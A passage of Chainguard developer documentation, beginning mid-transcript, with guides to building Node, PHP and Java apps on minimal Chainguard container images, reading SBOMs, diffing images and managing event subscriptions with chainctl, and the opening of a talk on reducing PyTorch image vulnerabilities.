2:03 Now, in this case, I just asked for information on the latest tag. 2:07 If you have a downloaded image, you'd want to use a digest of that image to get the correct details from the registry. 2:13 But alternatively, you can get the SBOM data direct from the image itself. 2:19 And let's take a look at an example of that. 2:24 So what I've done here is run ls on the /var/lib/db/sbom directory inside the container and that's listed a bunch of JSON files, one for each package in the image. 2:39 Now these JSON files are actually SPDX documents, but the file names themselves contain the version info that we're interested in. 2:47 So we can see this image doesn't include a lot except busybox and a few system libraries. 2:55 Now, this works because wolfi-base includes a shell — busybox — with the ls command that we ran. But lots of Chainguard images don't have this. 3:05 So you'll need to either copy this /var/lib/db/sbom directory out with something like docker cp or use a -dev variant of the image that does include a shell and ls. 3:18 But there you have it: two easy ways to get full version info on all packages in a Chainguard Container. 3:25 I hope that was helpful to you. --- ### Getting Started with the Node Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/node/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Node Chainguard Container is a distroless container image that has the tooling necessary to build and execute Node applications, including npm. In this guide, we'll set up a demo application and create a Dockerfile to build and execute the demo using the Node Chainguard Container as a base. This tutorial requires Docker, Node, and npm to be installed on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a Demo Application We'll start by creating a small Node application to serve as a demo. This application uses a mock server to test GET and POST requests, and is based on the Docker Node example. First, create a directory for your app. In this guide we'll use wolfi-node: mkdir ~/wolfi-node && cd ~/wolfi-node Run the following command to create a new package.json file. npm init -y Exit the init process. You do not need to fill out the metadata as this is a demo. Install npm: npm install Next, install the application dependencies. We'll need ronin-server and ronin-mocks, which are used together to create a "mock" server that saves JSON data in memory and returns it in subsequent GET requests to the same endpoint. npm install ronin-server ronin-mocks Using your code editor of choice, create a new file named server.js for your application.
Here we'll use nano: nano server.js

Copy the following code to your server.js file:

```js
const ronin = require('ronin-server')
const mocks = require('ronin-mocks')

const server = ronin.server()

server.use('/', mocks.server(server.Router(), false, true))

server.start()
```

Save the file when you're done. Then, run the server with: node server.js

This command will start the application and wait for connections on port 8000. The mocking server will save any JSON data submitted by a POST request. From a new terminal window, run the following command, which will make a POST request to your application sending a JSON payload:

curl --request POST \
 --url http://localhost:8000/test \
 --header 'content-type: application/json' \
 --data '{"msg": "testing" }'

When the connection is successful, you should get output like this on the terminal that is running the application: 2023-02-07T15:48:54:2450 INFO: POST /test

You can now test that the content was saved by running a GET request to the same endpoint: curl http://localhost:8000/test

You'll get output similar to this:

{"code":"success","meta":{"total":1,"count":1},"payload":[{"msg":"testing","id":"f427f835-3e93-43ad-91c8-d150dffba0f9","createDate":"2023-02-07T14:48:54.256Z"}]}

The demo application is now ready. In the next step, you'll create a Dockerfile to run your app. Before moving along, make sure to stop the server running on your terminal by typing CTRL+C (or CMD+C for macOS users).

Step 2: Creating the Dockerfile

In your code editor of choice, create a new Dockerfile: nano Dockerfile

The following Dockerfile will:

- Start a new image based on the cgr.dev/chainguard/node:latest container image;
- Set the work dir to /app inside the container;
- Copy application files from the current directory to the /app location in the container;
- Run npm install to install production-only dependencies;
- Set up additional arguments to the default entrypoint (node), specifying which script to run.

Copy this content to your own Dockerfile:

```Dockerfile
FROM cgr.dev/chainguard/node
ENV NODE_ENV=production
WORKDIR /app
COPY --chown=node:node ["package.json", "package-lock.json", "server.js", "./"]
RUN npm install --omit=dev
CMD [ "server.js" ]
```

Save the file when you're finished. You can now build the container with: docker build . --pull -t wolfi-node-server

Once the build is finished, run the container with: docker run --rm -it -p 8000:8000 wolfi-node-server

And it should work the same way as before: the terminal will be blocked with the application waiting for connections on port 8000. The difference is that this is running inside the container, so we set up a port redirect to receive requests on localhost:8000.

curl --request POST \
 --url http://localhost:8000/test \
 --header 'content-type: application/json' \
 --data '{"msg": "testing node wolfi image" }'

You can now query the same endpoint to receive the data that was stored in memory when you ran the previous command:

curl http://localhost:8000/test

{"code":"success","meta":{"total":1,"count":1},"payload":[{"msg":"testing node wolfi image","id":"6011f987-b9f8-4442-8253-d54166df5966","createDate":"2023-02-07T15:57:23.520Z"}]}

Advanced Usage

If your project requires a more specific set of packages that aren't included within the general-purpose Node Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user.
Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Building Minimal Container Images for Applications with Runtimes URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/minimal-runtime-images/ Last Modified: September 6, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Resources The Dockerfiles used in this video and other supporting documentation are available on GitHub. Transcript Today, I’d like to talk about how to create minimal secure images when using a language that requires a runtime. 0:12 So here we’re thinking of things like Java, .NET or Python. 0:17 In these cases, you won’t be able to use the scratch image or the Chainguard or Google distroless static images, as they won’t include the files for the runtime. 0:28 In cases like these, we can still follow the approach of having a multistage build with the separate development and production image. 0:36 But this time our production image will need to have the files for the runtime installed. 0:42 So I’d like to work through an example with the Chainguard Maven and JRE images. 0:48 In this example, we’re using code from the pet clinic example application, but we’ve added our own Dockerfiles. 0:57 So you can see here we’re using a Chainguard Maven image to build. 1:02 All we really do is copy in the sources and then run the Maven wrapper script with a package argument and that’s going to produce our JAR file. 1:12 Then in the production image, all we really do is copy the JAR file that’s produced here into the image and set an appropriate entrypoint. 1:24 OK. 1:24 So let’s create this Docker image. 1:27 But the first thing I want to build is actually the “build” target. 1:30 So just building the build image to begin with. Now, because of the Docker cache, my last build that was pretty fast, but if you rebuild this yourself it’s gonna take a little bit longer. 1:43 OK. 1:44 Let’s take a look at that image. 1:47 I can see it’s pretty big. 1:48 So it’s 723 megabytes. 1:51 That’s not too surprising because you’ve got the JDK, Maven and all the resources required to build the JAR in there. 1:58 But it’s not something you’d want to transfer around too much. 2:02 OK. 2:03 So let’s take a look at the production image. 2:06 I’ll get rid of this target part and will rename it. 2:15 And again, it was cached, but this time it’s much smaller. 2:23 So that’s around half the size of the previous image. 2:28 Now, like the static images, we don’t have a shell or a package manager in this image. 2:35 Now, in this case, we didn’t specify a tag. 2:38 So we’ve used the latest version of both Maven and the JRE image. 2:45 This is fine for a lot of use cases, but sometimes you’ll want more control over the exact version of Java you’re using for the JDK and the runtime. 2:55 You can purchase a subscription to Chainguard images and that will give you access to tagged versions of the Java and Maven images. 3:04 But if that’s not feasible, another option is to use the Wolfi base image. 
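For readers who want to try this outside the video, here is a rough sketch of the kind of wolfi-base Dockerfile described next. The package names, JAVA_HOME path, jar name, and nonroot user below are assumptions for illustration only; the video's actual Dockerfiles are available through the GitHub link in the Resources section above.

```Dockerfile
# Rough sketch only: build and run a Java app on wolfi-base with explicit JDK/Maven packages.
# Package names, paths, and the jar name are assumptions, not taken from the video's repository.
FROM cgr.dev/chainguard/wolfi-base AS build
RUN apk add openjdk-17 maven
ENV JAVA_HOME=/usr/lib/jvm/java-17-openjdk
ENV PATH="${JAVA_HOME}/bin:${PATH}"
WORKDIR /work
COPY . .
RUN mvn package

FROM cgr.dev/chainguard/wolfi-base
RUN apk add openjdk-17-jre
ENV JAVA_HOME=/usr/lib/jvm/java-17-openjdk
ENV PATH="${JAVA_HOME}/bin:${PATH}"
# Run as a non-root user in production, as the video suggests.
USER nonroot
COPY --from=build /work/target/app.jar /app/app.jar
ENTRYPOINT ["java", "-jar", "/app/app.jar"]
```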
3:09 This allows us to effectively build our own Java image and specify the exact versions we require. 3:21 So we can modify the previous Dockerfile look like this. 3:27 where “FROM wolfi-base” is the major change. 3:31 And then we’re explicitly adding in open JDK version 17 and Maven version 3.9. We also set the Java HOME environment variable, but otherwise, it’s pretty much the same as before. 3:46 Then in the production image, we also use wolfi-base as the base and we add in open JDK version 17 again. 3:54 We also set the non root user. 3:57 So we don’t run as root in production and copy in the JAR as before. 4:04 OK. 4:04 So let’s build this image again. 4:11 I have a cached version. 4:12 So that was pretty fast. 4:15 Now note that this solution isn’t perfect. 4:18 And most notably, the final image is gonna include a shell and a package manager that wasn’t present in the previous build. 4:26 But interestingly, despite that this image is actually smaller than the other image. 4:37 Now, the reason for that is that the JRE image by default includes some locale data and that’s important to some Java applications and not important to some other ones. 4:51 So if you’re running a Java application where you need locale data, you’re going to need to add in a line, something like this and that will make your final image that bit bigger. 5:04 OK. 5:04 Just to round things off. 5:05 Let’s see the image running. 5:13 OK. 5:14 That seems to work. 5:16 So we’ve covered how you can use Chainguard images in applications that require run time. 5:21 And also what your options are if you need a specific version. I’ll add some links in the description that allow you to grab the code that I’ve gone through here. 5:31 But please let me know if you try this out and how it compares to other solutions. 5:36 Ok. 5:36 Thank you for listening. --- ### How To Compare Chainguard Containers with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/comparing-images/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product There may be times when you’d like to understand the difference between two Chainguard Containers. For example, you might want to know if there are any significant differences between yesterday’s build and today’s; or perhaps you want to know if any CVEs are present in a newer version of a custom container image. chainctl — Chainguard’s command line interface tool — allows you to directly compare two Chainguard Containers with its images diff feature. This guide outlines how to use the image diffing feature and highlights a few potential use cases for it. Prerequisites In order to use the chainctl images diff subcommand, you’ll need to have a few tools installed. You’ll need chainctl installed on your local machine. Follow our guide on How to Install chainctl to set this up. If you already have chainctl installed, be sure to update it to the latest version with chainctl update. Next, ensure you have Cosign installed. Our guide on How to Install Cosign outlines several methods for installing Cosign. You’ll also need Grype installed on your local machine, as chainctl uses this to scan the images when performing the diff. Follow the installation instructions for your operating system on the Grype project GitHub repository. Lastly, an example command in this guide uses jq — a command-line JSON processor — to make the command’s output more readable. 
You don’t strictly need to have jq installed in order to use the diff subcommand, but if you’d like you can install it by following the official documentation. Using chainctl images diff The chainctl images diff subcommand accepts the names of two Chainguard Containers as arguments and uses Grype to perform a vulnerability scan on each of them. It then retrieves both container images’ SBOM information and outputs the difference between the two along with the previously obtained Grype data. The diff subcommand follows this general syntax. chainctl images diff $FROM_IMAGE $TO_IMAGE As an example, try comparing the latest public go Chainguard Container with its latest-dev version. chainctl images diff cgr.dev/chainguard/go:latest cgr.dev/chainguard/go:latest-dev | jq This will return output like the following. Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3 { "packages": { "added": [ { "name": "sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3", "reference": "pkg:oci/index@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0", "reference": "pkg:oci/image@sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f", "reference": "pkg:oci/image@sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ], "removed": [ { "name": "sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc", "reference": "pkg:oci/index@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df", "reference": "pkg:oci/image@sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504", "reference": "pkg:oci/image@sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ] }, "vulnerabilities": {} } This command first uses Grype to scan each container image’s vulnerability data and then retrieves both images’ SBOMs. It then outputs the differences that it finds between the two. This sample output indicates that compared to the go:latest container image, the go:latest-dev image has three packages added, three removed, and no unique vulnerabilities. chainctlcompares the images like this because of the order they appear in the command. 
If you reversed the order of the images in the example command, the packages shown as added and removed would also be flipped: Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3 Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc { "packages": { "added": [ { "name": "sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc", "reference": "pkg:oci/index@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df", "reference": "pkg:oci/image@sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504", "reference": "pkg:oci/image@sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ], "removed": [ { "name": "sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3", "reference": "pkg:oci/index@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0", "reference": "pkg:oci/image@sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f", "reference": "pkg:oci/image@sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ] }, "vulnerabilities": {} } Be aware that because this is a relatively new feature, the format of the diff subcommand’s output is subject to change. Potential use cases Being able to find the exact difference between two Chainguard Containers with a single command allows users to make more informed decisions about what container images they use in their applications. This section goes over a couple scenarios where you may want to use the chainctl images diff command. One potential use case for why you would want to find the differences between two Chainguard Containers is that you’re curious about the differences between available release versions. Say you’re using Custom Chainguard Containers and your application is pinned to a specific version of go. By diffing the two container images, you could check what vulnerabilities you could remove by updating to the next patch or minor version. Another potential use could be in cases where you’re interested in knowing the difference between a Chainguard Container’s daily builds. For example, say you’d like to keep your images updated but only when there are significant changes between daily builds. You could diff between the running versions and the latest builds, only updating if there’s a meaningful difference. Learn more To learn more about the chainctl image subcommands, we encourage you to check out our chainctl command resources. You can also explore the rest of our Chainguard Containers resources to learn more about how images can help you keep your software secure by default. 
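As a concrete sketch of the version-comparison use case above, you could diff two tags of the same repository and use jq to focus on just the vulnerability changes. The organization, repository, and tags below are placeholders; substitute images you actually have access to.

```sh
# Placeholders: replace $ORGANIZATION and the tags with your own values.
FROM_IMAGE="cgr.dev/$ORGANIZATION/go:1.22.1"
TO_IMAGE="cgr.dev/$ORGANIZATION/go:1.22.2"

# Show only the CVE differences between the two builds.
chainctl images diff "$FROM_IMAGE" "$TO_IMAGE" | jq '.vulnerabilities'
```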
--- ### Getting Started with the PHP Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/php/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The PHP container images maintained by Chainguard include our standard, minimal images and development variants, both of which are suitable for building and running PHP workloads. The latest-fpm variant serves PHP applications over FastCGI, while the latest variant runs PHP applications from the command line. In this guide, we’ll set up a demo and demonstrate how you can use Chainguard Containers to develop, build, and run PHP applications. This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. What is distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. 1. Setting up a (CLI) Demo Application We’ll start by getting the demo application ready. This CLI app generates random names based on a list of nouns and adjectives. To exemplify usage with Composer, the app has a single dependency on minicli, a minimalist CLI framework for PHP. Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Locate the namegen demo and cd into its directory: cd edu-images-demos/php/namegen You can use the php:latest-dev image variant with a volume in order to install application dependencies with Composer. We’ll use the root user to be able to write to the volume mounted in the container: docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ install --no-progress --no-dev --prefer-dist You’ll get output like this, indicating that the package minicli/minicli was installed: Installing dependencies from lock file Verifying lock file contents can be installed on current platform. Package operations: 1 install, 0 updates, 0 removals - Downloading minicli/minicli (4.2.0) - Installing minicli/minicli (4.2.0): Extracting archive Generating autoload files 1 package you are using is looking for funding. Use the `composer fund` command to find out more! Next, make sure permissions are set correctly on the generated files. On Linux systems run the following: sudo chown -R ${USER}:${USER} . On macOS systems, run this: sudo chown -R ${USER} . The application should now be ready to be executed. For transparency, here is the code that will be executed, which you’ll find in the namegen script: #!/usr/bin/php <?php require __DIR__ . 
'/vendor/autoload.php';

use Minicli\App;

$app = new App();

$app->registerCommand('get', function () use ($app) {
    $animals = [ 'turtle', 'seagull', 'octopus', 'shark', 'whale', 'dolphin', 'walrus', 'penguin', 'seahorse'];
    $adjectives = [ 'ludicrous', 'mischievous', 'graceful', 'fortuitous', 'charming', 'ravishing', 'gregarious'];
    $app->getPrinter()->info($adjectives[array_rand($adjectives)] . '-' . $animals[array_rand($animals)]);
});

$app->runCommand($argv);

You can now execute the app to test it out. Run the following command:

docker run --rm -v ${PWD}:/work \
 cgr.dev/chainguard/php:latest \
 /work/namegen get

The command should output a random name combination: ludicrous-walrus

In the next step, you'll build the application in a multi-stage Dockerfile.

2. Building a Distroless Container for the Application

We'll now build a distroless container for the application. To be able to install dependencies with Composer, our build will consist of two stages. First, we'll build the application using the development variant, a Wolfi-based image that includes Composer and other useful tools for development. Then, we'll create a separate stage for the final container. The resulting container will be based on the distroless PHP Wolfi image, which means it doesn't come with Composer or even a shell. For reference, here is the content of the included Dockerfile:

```Dockerfile
FROM cgr.dev/chainguard/php:latest-dev AS builder

USER root
COPY . /app
RUN chown -R php /app

USER php
RUN cd /app && \
    composer install --no-progress --no-dev --prefer-dist

FROM cgr.dev/chainguard/php:latest

COPY --from=builder /app /app

ENTRYPOINT [ "php", "/app/namegen" ]
```

This Dockerfile will:

- Start a new build stage based on the php:latest-dev container image and call it builder;
- Copy files from the current directory to the /app location in the container;
- Enter the /app directory and run composer install to install any dependencies;
- Start a new build stage based on the php:latest image;
- Copy the application from the builder stage;
- Set up the application as entry point for this container.

You can now build the container with: docker build . --pull -t php-namegen

You'll get output similar to this:

```
[+] Building 0.1s (12/12) FINISHED                                    docker:default
 => [internal] load build definition from Dockerfile  0.0s
 => => transferring dockerfile: 322B  0.0s
 => [internal] load metadata for cgr.dev/chainguard/php:latest-dev  0.0s
 => [internal] load metadata for cgr.dev/chainguard/php:latest  0.0s
 => [internal] load .dockerignore  0.0s
 => => transferring context: 2B  0.0s
 => [internal] load build context  0.0s
 => => transferring context: 4.86kB  0.0s
 => [builder 1/4] FROM cgr.dev/chainguard/php:latest-dev  0.0s
 => [stage-1 1/2] FROM cgr.dev/chainguard/php:latest  0.0s
 => CACHED [builder 2/4] COPY . /app  0.0s
 => CACHED [builder 3/4] RUN chown -R php /app  0.0s
 => CACHED [builder 4/4] RUN cd /app && composer install --no-progress --no-dev --prefer-dist  0.0s
 => CACHED [stage-1 2/2] COPY --from=builder /app /app  0.0s
 => exporting to image  0.0s
 => => exporting layers  0.0s
 => => writing image sha256:e617d7afd472d4a78d82060eaacd3a1c33310d6a267f6aaf9aa34b44e3ef8e5c  0.0s
 => => naming to docker.io/library/php-namegen  0.0s
```

Once the build is finished, run the container with: docker run --rm php-namegen get

And you should get output similar to what you got before, with a random name combination. fortuitous-octopus

If you inspect the container image with a docker image inspect php-namegen, you'll notice that it has only two layers, thanks to the use of a multi-stage Docker build.
docker image inspect php-namegen
...
"RootFS": {
    "Type": "layers",
    "Layers": [
        "sha256:52cf795862535c5f22dac055428527508088becebbe00293457693a5f8fa1df2",
        "sha256:95a8dc6d81c92158ac032e5167768a04e45f25b3bf4009c5698673c19d36d5c2"
    ]
},
"Metadata": {
    "LastTagTime": "2024-11-15T12:52:18.412117879+01:00"
}
}
]

In such cases, the last FROM section from the Dockerfile is the one that composes the final image. That's why in our case it only adds one layer on top of the base php:latest image, containing the COPY command we use to copy the application from the build stage to the final container. It's worth highlighting that nothing is carried from one stage to the other unless you copy it. That facilitates creating a slim final image with only what's necessary to execute the application.

3. Working with the PHP-FPM Image Variant

The latest-fpm image variant is suitable for running PHP applications over FastCGI, to be served by a web server such as Nginx. In this section, we'll run a Docker Compose setup using the latest-fpm image variant and the Chainguard Nginx image. The namegen-api demo is a variation of the previous demo, but it serves the random name generation over HTTP. The application responds with a JSON payload containing the animal and adjective combination, and accepts an optional animal parameter to specify the animal for the final suggested name. Start by accessing the namegen-api demo folder. This should be at the same level as the previous namegen demo in the edu-images-demos repository. If your terminal is still open on the previous demo, you can navigate to the namegen-api folder with: cd ../namegen-api

The index.php file contains the following code:

```php
<?php

$animals = [ 'turtle', 'seagull', 'octopus', 'shark', 'whale', 'dolphin', 'walrus', 'penguin', 'seahorse'];
$adjectives = [ 'ludicrous', 'mischievous', 'graceful', 'fortuitous', 'charming', 'ravishing', 'gregarious'];

$chosenAdjective = $adjectives[array_rand($adjectives)];
$chosenAnimal = $_GET['animal'] ?? $animals[array_rand($animals)];

echo json_encode(['animal' => $chosenAnimal, 'adjective' => $chosenAdjective]);
```

To serve this application over HTTP, we'll use the latest-fpm image variant in a Docker Compose setup. The following docker-compose.yml is included within the namegen-api folder:

```yaml
services:
  app:
    image: cgr.dev/chainguard/php:latest-fpm
    restart: unless-stopped
    working_dir: /app
    volumes:
      - ./:/app
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:80
    volumes:
      - ./:/app
      - ./nginx.conf:/etc/nginx/nginx.conf
```

This Docker Compose setup defines two services: app and nginx. The app service uses the latest-fpm image variant and mounts the current directory to the /app directory in the container. The nginx service uses the Chainguard Nginx container image and also mounts the current directory to the /app directory in the container, setting it as the document root with a custom configuration.
A second volume replaces the default Nginx configuration with our custom one, included as nginx.conf in the same directory: events { worker_connections 1024; } http { server { listen 80; index index.php index.html; root /app/public; location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass app:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; } location / { try_files $uri $uri/ /index.php?$query_string; gzip_static on; } } } To run this setup, execute: docker-compose up This command will start the services defined in the docker-compose.yml file. You can access the application at http://localhost:8000 in your browser, or you can make a curl request to it: curl http://localhost:8000 You should get a JSON response with a random name combination: {"animal":"octopus","adjective":"ludicrous"} You can also try passing an animal parameter to the URL: curl 'http://localhost:8000?animal=cat' {"animal":"cat","adjective":"mischievous"} To stop the services, you can press Ctrl+C in the terminal where you ran docker-compose up. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose PHP Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Create, View, and Delete chainctl Events URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-events/ Last Modified: May 6, 2025 Tags: chainctl, events, Product This page shows you the basic usage of chainctl events commands. For a full reference of all commands with details and switches, see chainctl Reference. Chainguard events use the CloudEvents specification for describing event data. Chainguard Academy has several deeper guides on Chainguard CloudEvents. You may find our guide on Subscribing to Chainguard CloudEvents to be particularly useful for understanding how to work with events from Chainguard while Chainguard Events provides a deeper dive into the content and make up of events. There are three chainctl events commands available: create, list, and delete. Create event subscriptions To create a new event and subscribe to events in that organization or folder, use: chainctl events subscriptions create $SINK_URL A sink is an addressable or callable resource that can receive incoming events delivered over HTTPS and will translate the delivered event into a returned response that includes promised information. The style and type of response is set by the sink. Depending on the sink, you may be prompted to respond to some questions before this action is complete. You can add a -y to the command to automatically assume yes and run without interaction. 
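For example, to subscribe a webhook endpoint non-interactively, the invocation might look like the following sketch. The sink URL is a placeholder; use an HTTPS endpoint you control that can accept the delivered CloudEvents.

```sh
# Placeholder sink URL; replace with your own HTTPS endpoint.
SINK_URL="https://events.example.com/chainguard-webhook"

# Create the subscription, assuming "yes" for any prompts.
chainctl events subscriptions create "$SINK_URL" -y
```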
View your event subscriptions To retrieve a list of all your Chainguard account's subscriptions, use: chainctl events subscriptions list This will return a list of IDs and sinks for all of your subscriptions. Delete event subscriptions To delete an existing event subscription, use: chainctl events subscriptions delete $SUBSCRIPTION_ID Depending on the sink, you may be prompted to respond to some questions before this action is complete. You can add a -y to the command to automatically assume yes and run without interaction. --- ### Beyond Zero: Eliminating Vulnerabilities in PyTorch Container Images (PyTorch 2024) URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/beyond_zero_pytorch_2024/ Last Modified: April 8, 2025 Tags: video, Chainguard Containers, Product, AI Recording of Beyond Zero: Eliminating Vulnerabilities in PyTorch Container Images, presented by Dan Fernandez, Srishti Hegde, and Patrick Smyth at PyTorch 2024 Session Description Container images are increasingly the future of production applications at scale, providing reproducibility, robustness, and transparency. As PyTorch images get deployed to production, however, security becomes a major concern. PyTorch has a large attack surface, and building secure PyTorch images can be a challenge. Currently, the official PyTorch runtime container image has 1 CVE (known vulnerability) rated critical and 5 CVEs rated high. Improving this situation could secure many deployments that incorporate PyTorch for cloud-based inference or training. In this fast-paced session, we took a deep dive on the official PyTorch image from a vulnerability mitigation perspective, looking hard at included packages, executables, and active CVEs. We identify low-hanging fruit for increasing security, including stripping bloat and building fresh. We also talk about the next level of security practiced in Chainguard's PyTorch image builds, such as including SBOMs and going distroless. Finally, we consider emerging tools and approaches for analyzing AI artifacts such as models and how these systems can benefit PyTorch in production. Resources from this Video

- PyTorch Chainguard Container
- Course: Securing the AI/ML Supply Chain
- Learning Lab: Chainguard's AI Containers
- Chainguard Academy: Getting Started with the PyTorch Chainguard Container
- Overview: Chainguard's AI Containers

Transcript (Dan Fernandez) Good afternoon everyone and thank you for joining us. We're going to be presenting Beyond Zero: eliminating vulnerabilities in the PyTorch container image. This is an effort that concluded a couple of months ago that focuses on minimizing vulnerabilities in the PyTorch container image. But first, my name is Dan Fernandez, I'm a product manager at a company called Chainguard. Today I'm joined by Patrick Smyth, who's a staff developer relations engineer at Chainguard, and Srishti Hegde, who is a delivery engineer. We wanted to start by going over a little bit about why containers are also ideal for AI applications just like they are for other applications, and it has to do with a few of their properties, such as their portability, so you have a consistent development and production environment. They also offer efficiency, allowing you to scale with growing demands, and lastly they offer some isolation (not full isolation), and this encapsulation of apps in general that is consistent across environments also allows for the possibility of hybrid workloads, which a lot of large organizations are starting or continuing to transition into.
